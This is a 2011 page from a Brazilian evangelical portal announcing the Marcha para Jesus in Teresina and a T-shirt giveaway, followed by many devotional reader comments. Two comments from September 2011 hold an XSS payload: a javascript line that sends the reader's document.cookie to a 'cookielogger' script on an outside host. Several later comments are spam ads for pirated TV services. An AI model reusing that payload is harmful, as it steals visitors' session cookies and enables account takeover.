Publicidade publicidade | Portal Evangélico

Deixe seu comentário e concorra a 10 camisetas da Marcha para Jesus de Teresina/PI

Publicado em 06 de Junho de 2011 às 14:38 Fonte: Organização do Evento | Redação do Portal Fiel
Exibições: 8759 Comentários : 111

Concorra a Camisetas da Marcha:

Deixe seu Comentário, os 10 comentários mais criativos receberão, gratuitamente, uma camiseta da Marcha para Jesus 2011 - Teresina Pi

Vamos fazer dessa Marcha o renascer da esperança e amor, declarar que Jesus, aquele morreu por nós,  é digno de Toda Honra e Glória.

Data: 23 de Junho de 2011 às 15:00hs

O diferencial da Marcha desta vez será a campanha de impacto social chamada “Vista um amigo, Vista um Irmão”, que tem a missão de arrecadar roupas usadas na concentração da Marcha Para Jesus. O arrecadamento será feito através dos voluntários cadastrados na organização e as roupas serão direcionadas á famílias carentes, orfanatos e líderes de comunidades de todo o estado do Piauí.

Pontos de Venda da Marcha pra Jesus 2011 - Teresina PI:

- Livrarias Shekinah
- Livraria Fonte de Luz
- Line Gospel Locadora
- Igrejas cujo pastores fazem parte da Aliança

Programação da Marcha pra Jesus 2011 - Teresina PI:

A Marcha será dia 23 de junho às 15hs, com saida do Balão do São Cristovão até a Praça do Fripisa.

14:00 – Inicio da concetração com Ministração de louvor (Vários Ministérios da cidade)
16:00 – Concentração
17:00 – Inicio da Marcha
18:30 – Chegada na Praça do Fripisa
18:50 – Ministração com louvor

Percurso da Marcha pra Jesus 2011 - Teresina PI:


Visualizar Marcha Pra Jesus Teresina em um mapa maior

 

Campanha: "Vista um Amigo, vista um irmão"

Nas edições anteriores, a Marcha pra Jesus já arrecadou alimentos não perecíveis, colchões, lençóis, produtos de limpeza e etc. E neste ano teremos a campanha “Vista um Amigo, Vista um Irmão”, que tem a missão de arrecadar na concentração da Marcha Para Jesus, roupas usadas. Essas roupas serão direcionadas á famílias carentes, orfanatos e líderes de comunidades de todo o estado do Piauí.

 

O que é a Marcha pra Jesus?

A Marcha para Jesus é um evento internacional e interdenominacional (ou seja, realizada conjuntamente por diversas denominações evangélicas) que ocorre anualmente em milhares de cidades do mundo. No Piauí, é organizada pela aliança evangélica de pastores de Teresina. Sem fins lucrativos, a caminhada é realizada todo dia 23 de junho, sendo um evento já registrado pelo calendário da cidade.

Marcha pra Jesus - Piauí

No Piauí, a Marcha para Jesus se iniciou no ano de 2001, por motivações dos Líderes da aliança de Pastores do Piauí. Desde sua primeira edição, a marcha reúne milhares de pessoas afins de um impacto social e cristão. Em sua última edição se reuniram 100 mil pessoas, e neste ano de 2011 a previsão é de que 130 mil pessoas proclamem o nome de Jesus na capital Piauiense, Teresina. A marcha iniciará às 15h e sairá do Balão do São Cristóvão seguindo até a Praça do Fripisa.

Click Aqui e veja as fotos da Marcha para Jesus 2010

Para mais informações acesse o hotsite da Marcha pra Jesus:  

www.marchaprajesus.com.br

 

Concorra a Camisetas da Marcha para Jesus 2011:

 

Deixe seu Comentário, os 10 comentários mais criativos receberão, gratuitamente, uma camiseta da Marcha para Jesus 2011 - Teresina Pi

Obs.:

Entraremos em contato através do e-mail informado para indicar a data, a hora e o local do recebimento das Camisetas.


Comentários

Romulo Marcell - 06/06/2011 15:06:00

De tudo pode acontecer durante o ano, pascoa, natal, tudo. Mas a MARCHA PRA JESUS e a melhor forma de mostrar a todos que todo e qualquer esforco é válido para exaltar o nome de Jesus, que se sacrificou por todos nós!!!

Jefferson - 06/06/2011 15:06:00

Para exaltar ao Senhor todos marcharemos unidos para mostrar que somente Cristo é o Senhor!!

Fernando - 06/06/2011 16:00:18

Vai ser um grande evento e quero está la com todo o povo de Deus nessa grande caminhada...

Gloria Deus...!!

RUBIA - 06/06/2011 16:13:09

A Marcha pra JESUS,é um evento significativo para o Reino de DEUS,onde todas as Denominações Evangelicas se reunem com um só proposito que é levar o Ide de JESUS as pessoas que ainda não conheceram é uma forma que temos de sair as ruas,as praças,as avenidas proclamando que só JESUS é o unico que pode salvar o vil pecador,que não existe outro mediador entre DEUS e o homem.só JESUS CRISTO.

Thanya - 06/06/2011 16:24:39

Marcha para Jesus é p maior evento teresinense em se tratando de ter a participação de pessoas não-evangélicas! Que esse ano, vidas possam ser tocadas pelas maravilhas de Jesus através dessa marcha!

Cleidivania Lima - 06/06/2011 16:57:14

Vamos todos nos reunir e sair nas ruas para plocamar que a cidade de Teresina é do Senhor Jesus. A marcha para Jesus 2011, é uma oportunidade de demonstrar o grandioso amor de Deus para com todos os seus filhos independente da religião ou da filosofia de vida. Jesus ama a todos sem distinção. Que todos nos possamos estar reunidos com um só propósito, de louvar e anunciar que só Jesus Salva.

Filipe Ramalho - 06/06/2011 17:50:04

o que?? a MARCHA?? rum é so o evento mais esperado do ano...como é bom ficar perto de todo aquele povo de Deus sentindo o calor e saber que todos estão ali para um único propósito: louvar o nome do nosso senhor Jesus cristo...caramba contagem regressiva galera vamos la mais uma vez mostrar que o povo de Deus é imenso e que vamos alcançar mais almas pra cristo..amém.

Fatima Teixeira - 06/06/2011 18:04:52

Quem criou a marcha pra Jesus com certeza tem uma visão de um ganhador de almas pois embora não haja conversão no ato da marcha mais com certeza moverá corações,e nesses ultimos dias Cristo precisa de Pessoas que se dedique a dizer que só Ele salva e tem solução para todos. Que apaz reine nesta MARCHA PRA JESUS HONRA E GLORIA SEJA PRA ELE AMÉM.

Fatima Teixeira - 06/06/2011 18:11:02

NADA MELHOR DO QUE A UNIÃO, QUANDO O POVO DE DEUS SE UNE A GENTE VER A DIFERENÇA, PRINCIPALMENTE QUANDO O PROPÓSITO É DECLARÁ QUE O SENHOR AINDA ESTA NO CONTROLE, DA VIDA DO SER HUMANO E QUE ELE ESTA SEMPRE COM OS BRAÇOS ABERTO ESPERANDO A DECISÃO DE CADA UM, E DAS ATITUDES DE SEUS FILHOS.LUTEMOS POR UMA CAUSA JUSTA SALVAÇÃO DOS PECADORES

Tacyane - 06/06/2011 18:24:31

A macha para Jesus não é só um evento comum, pois tem o propósito de conseguir almas para Cristo, e mostrar o quanto Deus é maravilhoso, e com isso ganharemos muito mais.

Clayra Rodrigues - 06/06/2011 18:55:05

A Marcha pra Jesus de Teresina representa a disposição da Igreja pra ganhar mais almas pro Senhor Jesus.Que essa marcha compareça mais pessoas que das outras vezes, e que muitas vidas sejam alcançadas pela mensagem da cruz. É nóis!!!!!

Claudio Filho - 06/06/2011 19:22:28

Eu só espero que além de muitas almas e glória, Tenha muita música boa: Bons Cantores e Tocadores!

Chega de música de baixa qualidade nesses eventos!


Nós Podemos Fazer em e para Cristo Jesus!
Vamos Nessa Galera!Glória à DeUS

Patricia Aquino - 06/06/2011 22:27:40

A marcha para JESUS trata-se da unificação do corpo de CRISTO em um só proposito,somos membros do corpo, e a convocação do EXERCITO DO SENHOR avançado para a CONQUISTA, declaramos profeticamente q por onde a planta dos nossos pés pisarem estaremos esmagando a cabeça do INIMIGO...TODOS EM UMA SÓ VOZ LOUVANDO E GLORIFICANDO A DEUS...VESTIDO COM A ARMADURA DO SENHOR...E TAMBEM VESTIREMOS OS CONVOCADOS A FAZER PARTE DESSE EXERCITOTUDO É DO SENHOR...

cleiton visgueira - 06/06/2011 23:42:50

Pelo Senhor marchamos SIM e seu exército poderoso é, e sua glória será vista em toda terra, nesse dia vamos cantar vários hinos de vitória...GLÒRIA DEUS...

ariane - 07/06/2011 11:08:53

VAMOS MARCHA PARA JESUS JÁ PRA AGRADECER OQUE ELE VAI TRANFORMAR EM NOSSAS VIDAS DEPOIS DESSA MARCHA.. GLÓRIA DEUS!

Ellayne Katlley - 07/06/2011 12:49:08

É MARAVILHOSO OUVIR O MUNDO PROCLAMAR QUE EM DETERMINADAA MILHARES DE PESSOAS FIZERAM UMA GRANDE CONCENTRAÇÃO ....NÃO EM FAVOR DE RECURSOS ,NEM TAMBÉM EM FORMA DE REVINDICAÇÃO...MAS PARA LOUVAR, EXALTAR, E GLORIFICAR O REI DOS REIS E SENHOR DOS SENHORES :JESUS
E ESSA É A VITÓRIA QUE O MUNDO NÃO CONHECE....O POVO DE DEUS É FELIZ,O POVO DE DEUS TEM MOTIVOS PARA ADORAR...ASSIM COMO MUITO EM BREVE TODOS VERÃO E OUVIRÃO QUE MILHARES E MILHARES DE PESSOAS SUMIRAM DAQUI....VAI SER GLORIOSO NAQUELE DIA,EU AMO A MARCHA POIS É UM EVENTO DE MAIS UMA CONQUISTA PRA AQUELES QUE SERVEM A DEUS,É UM EVENTO QUE VISA A UNIFICAÇÃO,POIS SOMOS TODOS NÓS FILHOS DE UM SÓ DEUS...E ACIMA DE TUDO A SALVAÇÃO DE ALMAS!!MOSTRANDO A ESSE MUNDO QUE NÓS TEMOS A GARANTIA DE VITÓRIA!!!!!!!ALELUIAAAAAAAAAA

Evaristo Neto - 07/06/2011 16:01:35

Marchando pra Jesus iremos monstrar para o mundo que o nosso Deus salva e cuida de seus filhos!!!!!!!

JOSUÉ - 07/06/2011 22:21:22

A Marcha pra JESUS,é um evento de grande concentração popular sem fins lucrativos o qual podemos anunciar o evangelio Cristocentrico,genuino do Senhor ,temos a oportunidade de pregar a palavra de Deus ao pecador que ele tem uma grande oportunidade de aceitar o único que pode salvar a sua alma da condenação e do juizo eterno;que neste dia todos os cristãos independente de Denominação saiam as ruas protestando a sua fé em Deus.

eliane de sousa pontes - 07/06/2011 22:57:17

Que deus venha nos fazer mas que vencedores sobre tudo o que está acontecendo no mundo!eu sei em quem tenho crido e sei que o meu redentor vive e por certo ele se levantara. estarei machado para jesus dia 23 de junho.

Rosangela Vasconcelos/B.c - 08/06/2011 0:46:03

oh! como é bom e agradável que todos no dia 23 de junho oficialmente na marcha pra Jesus, possamos está unidos com o propósito de levar a palavra que cura,liberta,salva e batiza em nome de Jesus.

que Deus nos conceda essa graça.

amém!!!!!!!!!!!!!

Jakcelia - 08/06/2011 16:44:37

A MARCHA PARA JESUS 2011 SERA UMA BENÇAO
Renda-se, como eu me rendi. Mergulhe no que você não conhece como eu mergulhei. Não se preocupe em entender, viver ultrapassa qualquer entendimento.
JESUS E A UNICA SOLUÇAO

Jandeilson Mario - 09/06/2011 9:43:00

Muito bom essa organização que mais uma vez vai impcatar a cidade de Teresina. Onde todos os soldados de Cristo estarão marchando,profetizando,orando,louvando e adorando ao único que é digno de receber a honra e a glória a força e o poder.Para mudar a geografia da história de Teresina. Piauí celeiro debenção.Marcha profetica pra Jesus!!

SHEILA MARA - 09/06/2011 14:24:52

MARCHA PARA JESUS FEITA PARA OS QUE PROCLAMAM A LUZ DO MUNDO PARA CONQUISTAR ALMAS PARA O NOSSO REI JESUS CRISTO.VAMOS GALERA MOSTRAR AO MUNDO OS VERDADEIROS ADORADORES DO PAI

pedro gustavo - 09/06/2011 15:01:04



vai ser uma bençao a marcha

MARCIA - 10/06/2011 6:01:39

COM JESUS SOMOS MAIS FELIZES, E MARCHANDO COM ELE MOSTRAREMOS QUE O BRASIL E DO SENHOR.E QUE A MARCHA PARA JESUS VAI SER UMA BENÇÃO.

italo - 10/06/2011 18:16:54

a marcha pra jesus vai se tornar um evento historico nessa cidade e unidos vamos mostrar para o mundo o DEUS que nós servimos

italo - 10/06/2011 18:21:06

vamos nos unir levando conosco a bandeira da vitoria e impactar esta cidade, e que o mundo possa ver CRISTO brilhar em nossas vidas

Luana Silva Lima - 10/06/2011 23:10:40

Neste momento não existem raças; não existem denominações; nem diferenças... A ordem é que se marche... E que se cante em uma só voz: Jesus é o Rei da Glória... Que se prostem os reis da terra diante do exército de Deuus...

luanna - 10/06/2011 23:18:03

Já posso ouvir trombetas e trovões, e a voz de Deus quebrando o jugo, nos dando vestes de louvor... Já posso ouvir os ossos que se juntam, se levantam como um povo... É o exército de Deus. Marchem herdeiros do Rei da Glória...

Luanna - 10/06/2011 23:23:24

Eis que tudo preparado já está... Vistan-se de toda amardura... E marchem para a Terra prometida, uma nova Teresina. Eis que Deus irá estremecer esta terra tremendamente e homens confessarão que Jesus é o Rei da Glória.

Luanna - 10/06/2011 23:26:02

Como é bom e agradavél que o povo de Deus viva unido como se todos fossem irmãos... Deus venha nos abençoar, e que esta união esteja sempre entre nós.

Luanna - 10/06/2011 23:28:43

ÁH! EU QUERO MARCHAR DE AMARDURA... EU QUERO A CAMISA...Nem que seja com defeito, eu preciso...

boanerges araujo - 11/06/2011 9:00:04

eii é á minha primeira marcha pra JESUS ....eu ñ quero ir 100 á camisa!!! pra que eu possa dizer pra todos que eu fui e sou de JESUS...e macho em nome deleEEEEE

José Mendonça - 11/06/2011 10:43:10

Procurei no mundo inteiro
Algo que me trouxesse luz
Então alguém teve a idéia de criar
A "Marcha para Jesus"
E encontei com certeza
Um evento que exprime amor
E para o Nosso Senhor Jesus Cristo
Toda honra, glória e Louvor

Dimas Soares Jr - 11/06/2011 12:41:23

Venha com sua família para mais um encontro com JESUS...
...pois ele é verdade o caminho e a luz!
Marcha para Jesus, Teresina 2011.

Max Danizio - 11/06/2011 19:50:20

Marchar pra Jesus é uma declaração de amor ao Senhor
É hora de marchar e louvar a Deus soltando a voz
Não nos envergonharmos daquele que, apesar dos nossos pecados
não se envergonhou de nós!

Paulinh@ - 12/06/2011 0:02:03

Há pensamentos que são orações. Há momentos nos quais, seja qual for a posição do corpo, a alma está de joelhos.

E a Marcha para Jesus 2011 vai ser um dos meus primeiros contatos com a religião evangélica...O primeiro de muitos... E A camisa vai ser uma viagem a três estações: ação, experiência e recordação!

O valor das coisas não está no tempo que elas duram, mas na intensidade com que acontecem...

Beatriz - 12/06/2011 0:11:21

"EU VOU MARCHAR COM O POVO DE DEUS,MARCHAMOS JUNTOS SIM!! RUMO AO CÉU!! E O DEUS DE PAZ ESMAGARÁ A SATANÁS DEBAIXO DE NOSSOS PÉS!!! YÉH!!"

lainy - 13/06/2011 8:29:37

A marcha para Jesus é uma força cristã que tem como propósito impactar o Brasil e sacudir o povo de Deus para uma mudança em nossa geração!Mudança esta que começa dentro de mim e de você cristão!
Façamos da marcha para Jesus instrumento de transformação e que as luzes sejamos nós para essa geração escura e sem paz....

Lorena - 13/06/2011 9:59:00

Marchando para Cristo e pisando no Capeta !

Leyziane Machado - 13/06/2011 10:47:08

Vamoos ser Paiis de multidões galera , Marchemos para Jesus , o Senhor dos exercitos , aquele que vive e reina pra todo sempre
Teresina é do Sehor Jesus !!

Leyziane Machado - 13/06/2011 10:49:16

Temos que ser um , como o Pai em Cristo é !! Vamos mostrar para o mundo o Deus a quem servimos, o nosso Deus , o Deus do impossivel ^^"

PATRICIA RODRIGUES - 13/06/2011 13:20:30

Senhor, essa marcha é para a glória do teu nome JESUS, é para o reconhecimento da Soberania do SENHOR DOS EXÉRCITOS, o qual nós servimos e dedicamos nosso amor e nossa vida a Ele...Através de nosso esforço fisico neste dia, mostraremos ás nações que só o senhor é DEUS e que se não nos render-mos a Ele nossa vida não passa de uma mera ilusão que traz como fruto o pecado, e quando servimos a esse DEUS verdadeiramente, tudo muda e tudo é motiva de alegria e renovo para a Glória do Deus Altíssimo...fiquem na Paz de Cristo Jesus e sejam abençoados!

RAIMUNDA NONATA PEREIRA D - 13/06/2011 15:13:32

A MARCHA PRA JESUS É A DECLARAÇAO DE AMOR MAIS LINDA,QUE SEUS FILHOS PODERIAM FAZER,A UM DEUS QUE MERECE TODA HONRA,E TODA GLÓRIA.

KLEYA - 14/06/2011 12:32:28

MARCHAR É MUDAR DE POSIÇÃO! isto significa dizer que não somos mais os mesmos se Cristo vive em nós! Já estamos na posição de filhos do altissimo e de noiva do cordeiro. È ou não é uma ótima posição?
Então, nesse evento a ORDEM É MARCHAR e NÃO RECUAR!!!
MARCHA IRMÃO, MARCHA PASTOR, MARCHA IGREJA DO SENHOR.

Sabrina - 16/06/2011 8:22:37

Vamos marchar na busca do nosso Salvador, e vestir um irmão com a armadura de Deus porque só com ele encontramos paz, amor e graça!!!

arthur carvalho do nascim - 16/06/2011 12:10:50

vamos todos unir nossas mãos e vozes para louvar o nome de nosso Senhor Jesus,para estremeer o inferno e libertar corações, que Deus abençoi a todos os participantes e ouvites desse grande evento. Amem.....

DINHA - 16/06/2011 12:54:36

A marcha para Jesus é uma linda forma que temos de demonstrar para todo o mundo o quanto amamos e adoramos servir nosso Senhor Jesus Cristo.

Leyziane Machado - 16/06/2011 20:29:19

Nós somos muitos , mas em Cristo formamos um só corpo e cada um de nós está ligado um ao outro (Rm 12:5)


Vamoos marxaar para CRISTO , ^^"

KELYANA - 17/06/2011 9:13:27

A fé traz do Céu e das páginas amareladas da história antiga a pessoa de Jesus Cristo para habitar nos corações daqueles que O amam, e como um ato de amor nada melhor que machamos e proclamamos o nome do senhor.

Kayane - 17/06/2011 9:27:59

Será que um marinheiro ficaria parado se ouvisse o clamor de um naufrago? Será que um médico permaneceria sentado comodamente, deixando seus pacientes morrerem? Será que um bombeiro, ao saber que alguém está perecendo no fogo, ficaria parado e não prestaria socorro? E você, conseguiria ficar à vontade em Sião vendo o mundo ao seu redor ser condenado?Será que ficar alguem sentado enquanto muito muitos macham para a gloria do senhor?
Seja mais um soldado e venha machar conosco.

KELYANA - 17/06/2011 9:46:21

Tudo que Deus faz, tem um motivo, uma razão, um sentido Uma morte gerou vida, que foi Jesus Cristo morrer por nós,e nos deu ali na cruz, vida e graça, e por ele e sua graça e misericóridia estamos aqui, para declaramos o nosso amor, no maior evento evangelico do pais.A MACHA PRA JESUS.

andressa - 17/06/2011 11:00:15

vai ser uma bençao nao perco essa marcha por nads nesse mundo

Stella Rangel - 17/06/2011 11:35:09

Vamos participar dessa marcha para enaltecer aquele que é digno de toda honra, toda gloria, todo louvor e exaltação....aquele que deu sua vida por nós e que reina e pra sempre reinará....JESUS....vamos levar às almas perdidas e oprimidas a Sua santa palavra, e mostrar que só Ele tem o poder de libertar e salvar........e que sem Ele nada somos senão folhas caídas que vão para onde o vento quer....
Vamos orar para que tudo ocorra conforme a vontade de Deus, e se o inimigo de nossas almas quiser nos impedir ele ja estará derrotado para a graça do nosso Senhor Jesus Cristo.... AMÈM... Deus seja louvado...

Fernando Rocha - 17/06/2011 13:40:58

O que de melhor existe na Marcha para Jesus é sem dúvida poder ver,pessoas das mais diferentes denominações juntas proclamando o nome,não de uma instituição religiosa,mas sim o nome Daquele que era,que é e que há de vir em poder e glória para levar seu povo: Jesus Cristo, a Ele toda glória e honra sejam dadas para todo o sempre.

Isaque Rongel - 17/06/2011 15:54:39

Jesus em sua palavra diz " Ide por todo mundo e pregai o meu evangelho a toda criatura, quem crer e for batizado este sera salvo quem porem nao crer sera condenado" ....e conforme manda a palavra de Deus faremos.... iremos pregar o evangelho do nosso Senhor Jesus Cristo a toda criatura....levaremos a sua palavra aos cativos e oprimidos...........decretaremos em praça publica que so ele salva, que só ele merece toda honra e toda gloria e que so a ele prestaremos culto.....marcharemos em prol do nosso Cristo....todos nos, independentemente de qualquer que seja a denominação de cada um, caminharemos unidos louvando e engrandecendo o nome de Senhor Jesus, que vive e reina para sempre....Louvado seja Cristo Jesus...

Samyra Barros - 17/06/2011 16:07:31

Galera, vamos la!!
O evento mais esperado do ano, onde juntamos nossas forças para proclamar o nome de jesus. VAI SER BOM DE MAISS!!
DEUS SEJA LOUVADO!!

JAILTON - 17/06/2011 17:14:54

TODOS EM UMA UNICA MISSÃO!!
ADORAR O NOME DO NOSSO SENHOR!!!!
TE AMAMOS JESUS!!

ester - 17/06/2011 18:15:18

Que essa macha seja mesmo no proposito de adorar au nosso Senhor Jesus, se não tudo é em van, nosso Senhor que só o melhor do seu povo.

diego - 17/06/2011 18:52:45

pra mom não existe nenhuma palavra para indentificar a marcha pra jesus,,pois ela naum tem explicação,,pois quando vocé esta marchando com o seu melhor amigo (jesus cristo) ao seu lado pela vida d quem voce ama é super saboroso
pois voce sabe q com o senhor jesus cristo tudo é possivel
e a marcha pra jesua é uma forma de marcharmos e lutarmos pelo q nois queremos
GLORIA A JEOVA

diego - 18/06/2011 14:02:22

a marcha é(sem qxplicação)
rsrsrsrs

Maria das Graças - 18/06/2011 20:04:26

A Marcha pra Jesus será um evento maravilhoso e teremos a oportunidade de adorar ao Senhor e declarar que o PI é do Senhor Jesus a cada passo que daremos alí será simbolizando mais um avanço do Reino de Deus no nosso estado e que O o nome do Senhor Jesus seja louvado.

ELISANGELA SANTOS MACEDO - 18/06/2011 22:26:17

marcha para jesus é fé amor dedicação total ao nosso único DEUS, macha é um momento muitos especial para aqueles que ama o nosso senhor JESUS juntos podemos lovar ao único que é digino de receber toda honha e a gloria.marcha para jesus é e sempre sera macha para JESUS rumo ao nosso pai que é e sempre será ADORADO te adoramos a ti o rei JESUS.TE AMO MEU QUERIDO JEUS VOU MACHA PARA TI COM MUITO LOUVOR.

jhonildo de sousa rocha - 19/06/2011 12:17:48

caro irmãos de fé vamos machar juntos por um fututo melhor com jesus,vamos pisotiar o inferno e tomar do inimigo as almas perdidas e com jesus, torna-las luz e maes pisaremos na cabeça do diabo e mostraremos que com o exército de jesus ele ñ vence a luz.E pode batendo em retirada inimigo,com sua manada porque nós somos grande e vc não é nada.

JESUS TE AMA E EU TAMBÉM,AMÉM.

lildes - 19/06/2011 13:43:59

que nesse dia possamos está lá para adorar a Deus......pois somos filhos de um Deus vivo e maravilhoso

Lílian Costa - 19/06/2011 19:09:46

Marcha significa passos em um mesmo ritmo, no mesmo compasso. É por isso que que a Marcha para Jesus tem esse nome. A gente se reúne em prol de um mesmo objetivo que é adorar o senhor. Marchamos ao lado de Jesus Cristo com o objetivo de nos unir e tentar ajudar ao próximo...
MARCHA PARA JESUS: UMA CHUVA DE BENÇÃOS!

Maria Sousa - 20/06/2011 0:24:51

Proclamar o nome de Jesus é marchar com fé, é declarar ao mundo q Jesus é Rei e Senhor, é impactar nossa cidade com seu amor e sua palavra, resgatando almas pra o reino celestial!

Ana Mascarenhas - 20/06/2011 10:25:14

Jesus disse: Eu sou a luz do mundo; quem me segue de modo algum andará em trevas, mas terá a luz da vida. João.

.....o que ganha almas é sábio." Provérbios.

Em todo tempo ama o amigo, e na angústia se faz o irmão.Provérbios.

Essa camisa é para o meu irmão Daniel que vai este ano pela 1° vez para a marcha. uhu!!

MARCIANA MINEIRO VIANA - 20/06/2011 11:44:06

É a primeira vez que vou a marcha pra jesus.Meu irmão é pastor e toda minha familia é crente patizados no senhor jesus.Mas,essas camisas seriam pra uns colegas da minha turma da faculdade e parentes.Eles acham que só podem ser felizes se fazerem parte das coisas do mundo.Sempre tento provar o quanto estão errados.Jesus mudou minha vida em 2008 depois de uma meningite.Queria que atraves das camisas eles se lembrassem sempre que as vestissem ou as vessem no guarda roupa,o quanto o dia da marcha fez a diferença em suas vidas e em seus pensamentos,pois Jesus veio ao mundo para salvar os pecadores.Obrigado!E nome de Jesus ate quinta.

Portal Fiel - 20/06/2011 15:23:25

Promoção encerrada!!

Entraremos em contato (através do e-mail informado) com os 10 ganhadores das camisetas promocionais da Marcha para Jesus 2011 - Teresina/Pi.

Atenciosamente,

Portal Fiel

luanna - 21/06/2011 9:12:16

Olho o meu email de cinco em cinco minutos só pra ver se eu ganhei rsrsrssr.A minha mãe já está ficando louca de me ouvir falar '' será que eu ganhei'' rsrsrsrs

luanna - 21/06/2011 9:18:03

...E Deus é por nós, quem será contra nós? Ninguém! Entáo por que temer exército de Deus? Deus dará ordem aos seus anjos a nosso favor. Marche povo de Deus, e proclame quem é o Rei da Glória, é Jesus o Rei da Glória...

priscilla - 21/06/2011 10:54:44

essa caminhada e uma forma de demonstrarmos nosso amor por aquele que nos amou primeiro...meu ídolo morreu e ressuscitou por mim!e o seu?que todo dia nos façamos essa pergunta...te amo JESUS...REI DOS REI E SENHOR DOS SENHORES

Portal Fiel - 21/06/2011 15:29:48

Promoção encerrada!!

Enviamos um e-mail com as instruções para o recebimento das camisetas para cada um dos 10 ganhadores, se você deixou o seu comentário neste evento, verifique sua caixa de entrada para saber se você foi um dos ganhadores.

Grato,

Portal Fiel

Da guia - 22/06/2011 17:37:20

BONITO DEMAIS, MARCHA PARA JESUS, MILHARES DE PESSOAS UNIDAS EM UM SÓ CORO QUE JESUS É O NOSSO SALVADOR, NOSSO POP STAR PRINCIPAL.O QUAL DEVEMOS TODA ADORAÇÃO.

Bruna Pereira Rodrigues - 23/06/2011 2:05:52

Macha Pra Jesus o nome Ja diz tudo ele Merece toda a Gloria e o Louvo

alessandro - 23/06/2011 6:30:29

sempre quiz na macha em sp
mais nunca da
hoje eu irei cominha filha
a primeira vez
tem duas camiseta pra mim e pra minha filha que tem 10anos

ADRIANA MORAIS - 23/06/2011 8:59:49

SE O MEU POVO QUE SE CHAMA POR MIM, SE HUMILHAR E CLAMAR, E ORANDO SE ARREPENDER. EU OUVIREI DOS CEÚS PERDOAREI E SARAREI SUAS TERRAS. ASSIM DIZ O SENHOR!!!!! ENTÃO... HJE TERESINA VAI CLAMAR O NOME DO SENHOR E DIZER QUE SÓ ELE É DIGNO DE HONRRA E GLÓRIA!!!!!

marilza souza - 23/06/2011 20:41:28

esta marcha para jesus esta sendo uma bençao nas vidas das pessoas depos de 20 anos estou indo dinovo aleluiama
marilza 23 6 2011 sp

CLAUDETE - 02/07/2011 21:04:30

a marcha éa mas esperada do ano pois através dela muitos recebem a palavra de deus um abraço até em breve.

sonia - 02/07/2011 21:13:08

o exécito de deus esta se preparando para marcha e essa batalha ja esta ganha pela honrra e gloria de deus

brena - 06/07/2011 14:00:32

huo0o,hoo0u a macha para jesus vai ser uma beção demas

asdsad - 25/07/2011 2:13:45

Muito bom

André MG - 31/08/2011 11:42:27

Por mais leiga que a pessoa seja a respeito do exame de ordem, torna-se patente que uma avaliação que reprova 95% dos candos não é um método justo, é óbvio que a culpa não está nos bacharéis ou nas instituições privadas que segundo a OAB cresceram desordenadamente. Falácia é dizer que só os cursos de Direito não formam profissionais aptos a exercer sua profissão. E as demais profissões?? A verdade é que o exame perdeu o controle, deixou de aferir os candos para arrecadar, portanto deve ser extinto.
Acompanhe a realidade desse exame:
://fimexameoab.ning.com/
://.peticaopublica.com.br/?pi=P2011N12585

java script: document.loc - 14/09/2011 20:03:03

java script: document.location = '://.redeon.com.br/XSS/cookielogger.php?c=" +document.cookie =' + documento

java script: document.loc - 14/09/2011 20:03:33

java script: document.location = '://.redeon.com.br/XSS/cookielogger.php?c=" +document.cookie =' + documento

Valdineia pereira dos san - 09/04/2012 16:54:50

Deus e fiel nome de jesus vai ser uma bençao. Porque quando fazemos deus de coraçao tudo fluir amem!

david - 17/05/2012 23:09:06

a marcha para jesus é termenda é ato profetico para liberta vidas do cativeiro.e pastores reuniu os líderes das igrejas de teresina e cidades vizinhas e disse:isto é o que o senhor ordenou com autoridade

ailton - 21/05/2012 21:12:49

Se você tem Smart TV esse é o site .tvhd.com.br

narcisa lidia murça sodre - 29/05/2012 12:52:33

o que dizer de uma festa tao linda.TUDO PRA JESUS.passo por muitas provaçoes mais mesmo sem ser evangelica ele esta sempre comigo,so me da bençaos.MUITO OBRIGADO

Thaynara cristina dos san - 03/06/2012 13:38:48

essa mancha vai se abençoada muito e que deus abensoe todos os que estao organisando vou ganha em nome de jessus

Adbeel - 04/06/2012 22:51:25

Eu acho que o Site esta muito desorganizado não da´para tirar as informações necessária, isso impede muitas pessoas de pouco entendimento para poder esta participando desse maravilhoso evento,
Deus abençoe espero ter ajudado , apaz

MIDIÃ ALVES DE CARVALHO - 05/06/2012 11:13:44

A MARCHA PRA JESUS 2012 SERÁ A MELHOR DELAS, POIS 2012 É O ANO DA TOTALIDADE DO SENHOR E SE É TOTALIDADE, ESTAREMOS LA COM A CAMISA DA MARCHA NA TOTATILIDADE DA ALEGRIA, PULANDO E LOUVANDO O NOSSO DEUS.

pereira - 10/07/2012 0:37:12

Em menos de 1 minuto você estará assistindo TV de graça .tvdigitalnopc.com.br

sergio - 21/07/2012 10:41:38

TV Digital com 500 canais sem mensalidade .tvdigitalnopc.com.br

Ary - 28/07/2012 2:10:44

Graças a .tvdigitalnopc.com.br a Sky nunca mais vai ver a cor do meu dinheiro

Adriana s - 29/07/2012 16:12:06

Tenha 514 canais em sua casa .tvdigitalnopc.com.br

ana nubia - 31/08/2012 16:22:46

Ative mais de 500 canais em sua Smart TV .smarttvhd.com.br

geisa - 09/09/2012 21:28:47

O melhor sistema de TV HD .tvhd.com.br

Lucelia - 26/10/2012 21:45:05

Oi galera, gostaria de uma ajuda, eu adquirir um pacote de TV HD no PC no site .tvhd.com.br tenho acesso a vários canais através de um painel de controle que eu visualizo no próprio navegador, como eu faço para gravar os programas e série de TV no meu PC, lembrando que não tem nem um programa instalado no meu PC é todo pelo próprio navegador 100% online.
Quem tiver uma ideia, por favor, me ajude meu e-mail: riclife@ig.com.br

sergio marques - 04/11/2012 1:43:46

Oi galera, gostaria de uma ajuda, eu adquirir um pacote de TV HD no PC no site .tvhd.com.br tenho acesso a vários canais através de um painel de controle que eu visualizo no próprio navegador, como eu faço para gravar os programas e série de TV no meu PC, lembrando que não tem nem um programa instalado no meu PC é todo pelo próprio navegador 100% online.
Quem tiver uma ideia, por favor, me ajude meu e-mail: riclife@ig.com.br

Tayna - 24/04/2013 22:15:35

vamos adora ao reis dos reis senhor dos senhores, vamos ser pai dessas pessoas tão famindas da palavra de DEUS, vamos ser ganhadores de almas para o nosso senhor,JESUS CRISTO O FILHO DE DEUS. Gloria á DEUS meus amados irmão.

Geiciele - 25/04/2013 15:03:18

Oi galera!!Vamos todos comparecer a marcha pra jesus 2013!! Por que jesus tranforma vidas atraves da marcha!! pois Quem se refugia no Senhor Jesus Cristo, sempre encontrará nele muito mais do que já tinha visto, lido, ouvido ou imaginado, ou até mesmo conhecido!!!!

Priscila - 25/04/2013 15:09:41

